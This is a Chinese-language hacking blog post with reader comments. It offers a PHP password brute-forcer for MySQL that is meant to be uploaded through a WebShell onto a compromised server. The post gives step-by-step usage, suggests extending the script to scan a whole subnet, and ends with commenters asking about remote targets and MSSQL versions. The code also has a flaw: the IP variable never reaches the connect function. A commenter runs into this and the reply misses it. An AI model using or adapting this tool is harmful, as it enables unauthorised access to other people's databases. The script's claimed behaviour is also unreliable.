<?
set_time_limit(0);                                   //脚本不超时

$ip = "localhost";                                   //IP
$user = "root";                                      //用户名
$passwd = file("password.txt");                      //密码字典

for($i=0; $i<count($passwd); $i++){
    $pass = Str_Replace("\r\n", "", $passwd[$i]);   //剔除多余的回车+换行
    connect($user, $pass);
    flush();
}
echo "扫描结束!";

function connect($user, $pass) {
    if(@mysql_connect($ip, $user, $pass)){
        echo "<font color='#0000FF'><b>得到密码:<font color='#FF0000'>".$pass."</font>!!!</b></font>";
        exit();
    }
    else {
        echo $pass.'<br>';
    }
}
?>

代码简单的不能再简单了,就不解释了,功能很简单,传到WebShell上去暴力破解本机的MySql数据库Root或其它用户的密码,因为是破解本机,所以速度奇快无比,有点效果,这个以前有人发过,这个是我改过的。

爆破速度奇快无比,暴力2W密码只需要十几秒,密码破解准确率达100%,稍微改一下就可以暴力整个C段的,你懂的……

用法:

1、修改 PHP 代码中的用户名与IP

2、准备字典 password.txt,每行一个,理论上支持无数行。

3、将脚本和字典一起传到目标Web服务器上,访问该脚本,即开始暴力破解,破解结果实时输出,盯着就行了。

留言评论(旧系统):

【匿名者】 @ 2012-04-05 21:15:35

问下核老大,这个能不能爆破远程的主机,ip那个地方我填写外部的ip?

本站回复:

是的,完全支持。靠,这个压根不用问啊,晕……

佚名 @ 2012-11-19 19:49:48

php5.3.18没法执行啊

本站回复:

请贴出具体报错内容……

佚名 @ 2014-01-29 01:05:40

核老板 来份字典如何

本站回复:

你妹,百度一下一大堆……

by阿明 @ 2014-01-29 04:22:40

核总,太给力了,强烈你再写个爆破sa的脚本

本站回复:

尼玛,改下数据库链接方式能死啊……

酒逍遥 @ 2014-01-29 17:27:23

简单,高效 不过个人觉得关键点在 密码字典上.

本站回复:

字典 +1

4bc @ 2014-02-01 14:49:43

核总,个人觉得可以加上ini_set("memory_limit","-1");或直接动.htaccess文件。如何哇

本站回复:

Good JB!这个可以有!

佚名 @ 2014-05-31 18:48:12

经测试只能爆破本机。本机以为,完全没法用,或许我不会用求指教

本站回复:

用来暴破服务器本机或C段机器。

小城 @ 2014-06-01 18:28:40

$ip = "localhost";换成$ip = = file("ip.txt"); 爆破mssql。如果php没开启mssql odbc扩展是不行的。。。。。

本站回复:

是滴~

sabre @ 2015-01-27 21:42:18

不能爆破远程ip 。。。当我填入 192.168.1.149 还是爆破自己的本机3306 。。。。

本站回复:

$ip = "192.168.1.149"; //IP

sabre @ 2015-01-27 21:48:12

我填入ip为 192.168.1.149 结果破解的还是本机的ip 如何破?

本站回复:

$ip = "192.168.1.149"; //IP

佚名 @ 2015-06-18 14:14:15

再有个帐号密码 生成脚本就好了

本站回复:

+1

小手一抖 @ 2015-06-20 21:08:29

写个c语言的命令行参数爆破sql好么,同时输出结果

本站回复:

-_-!!!